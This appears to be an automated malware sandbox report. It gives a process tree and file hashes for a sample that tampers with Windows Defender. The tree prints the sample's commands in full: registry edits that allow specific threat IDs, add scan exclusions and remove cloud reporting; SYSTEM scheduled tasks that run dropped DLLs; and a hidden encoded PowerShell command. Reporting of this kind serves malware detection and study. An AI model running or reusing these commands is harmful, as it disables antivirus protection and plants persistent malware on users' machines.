C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1728
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4900
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:323⤵PID:2788
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:324⤵PID:4280
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:643⤵PID:3704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:323⤵PID:4504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:643⤵PID:3352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:323⤵PID:3484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:643⤵PID:4728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:323⤵PID:2676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:643⤵PID:4304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:323⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:643⤵PID:2436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:323⤵PID:5000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:643⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:323⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:643⤵PID:3608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:323⤵PID:4212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:643⤵PID:4768
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkylGrnIB" /SC once /ST 04:50:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkylGrnIB"2⤵PID:2056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkylGrnIB"2⤵PID:3964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyQsokuHCPHrPIKjm" /SC once /ST 03:05:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\Xvsmlts.exe\" nk /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyQsokuHCPHrPIKjm"2⤵PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4200
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1920
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2008
-
C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\Xvsmlts.exeC:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\Xvsmlts.exe nk /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bGKvUxYEKJhmpNiCsB"2⤵PID:736
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1436
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4680
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2368
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jNivjIkKU\rNNBKs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydofTeYvCFRiBkl" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydofTeYvCFRiBkl2" /F /xml "C:\Program Files (x86)\jNivjIkKU\xYetWiD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydofTeYvCFRiBkl"2⤵PID:2900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydofTeYvCFRiBkl"2⤵PID:5108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LBuWRqeXoiHTKS" /F /xml "C:\Program Files (x86)\HCxyEYsLPoBU2\vaygUsA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oqzULkuhADdZu2" /F /xml "C:\ProgramData\BsYOAUalmtuIFlVB\PXQeeQI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uNiyNhNrKWiTQIMhb2" /F /xml "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\BquCyMX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UeTWhQAkQYvpBfdsNev2" /F /xml "C:\Program Files (x86)\VYxEjiIKDDwYC\hKqIoZH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BTdQtQCLlbasEjBtK" /SC once /ST 06:15:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SVXwGszHTIpIGNNH\hajuHavz\VpRNkcr.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BTdQtQCLlbasEjBtK"2⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:224
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4684
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4552
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyQsokuHCPHrPIKjm"2⤵PID:2060
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\hajuHavz\VpRNkcr.dll",#1 /site_id 5254031⤵PID:3212
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\hajuHavz\VpRNkcr.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BTdQtQCLlbasEjBtK"3⤵PID:3556
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57238d27d7fb5997854360c30904e6647
SHA16b5ca62c19b1198102844008c06af8ce081c2488
SHA256a2dc9e9911fc2f78f9bea94ede6525a2b573659e241ac497f26c5caa9185fd03
SHA512ca08312191f6239fa3a4743099c03b9b4b646ea61e1e49b9c6a3a13fec42165106bc2f122038f36d88c15d673dac7252d6b07ba848864c809786db1a12e779cc
-
Filesize
2KB
MD5a071d75364bd361fccee6f3a40e5a007
SHA1095605801aebe88f057b5abaf6d6f54c12afc036
SHA256f0c7fc182815227ec836b0a765f64638aa23d8cbd78fd1e0eb29176827754d83
SHA512562786756d4f8fc5a9b8bf9bd4c754d6e2e05c1e9724327b56a3a7af6eac42efc0eb8519f40d6fee1612aa26fa14ba7b3a0e93aa7962e0271e9927b7772b0e9b
-
Filesize
2KB
MD5c309d6274726be1f888d8912b872cb6f
SHA1ca8ba89eddb83f2a4e00d639ec3536955c8339f7
SHA256a745a71275f4b910b6e1f07ccdea29af54732eed37968af9e3e74e811a9f9084
SHA512ecbf2c19909751a41e4bde151bf416cd5e51eee4748a5cd1c026659abfaa8dcaee6fc0a024ef0b95ec1fcb157c7a276299823ecd43c182291e45df66128c19db
-
Filesize
2KB
MD5589e12028bce6307d9fbf1d3dc623932
SHA16a2aa813be3626a140d7db05d1461014f11465a1
SHA256dca21583a53fbc5a4762ba6482910b9cf6beeca1af6682edc34242ab66f3980c
SHA512764b6cf5656c9fe48e77e7a10c5c2b9977f34dee1ac4ef5a1f7594fee496930f1a067317876ad92d86666838433c6db743b7a73225130ae1b7afc2994c7b2d31
-
Filesize
2KB
MD5353e54c9db07b835452df9331e29811c
SHA1425b6e05e15cb127e2040e297901ee636ea7b6b8
SHA256a390af001d3a5fc380d6a183f6bb1a3f4a27be62162823b5e4f62d5d3fea040a
SHA512135b67acc4ccbc001baaa4bce1285779ef982cb086eb2f6334cefc57e68be3121b5babaf07998db82438698738570b9d39b143cd62c0a73da98e5da2820dc629
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
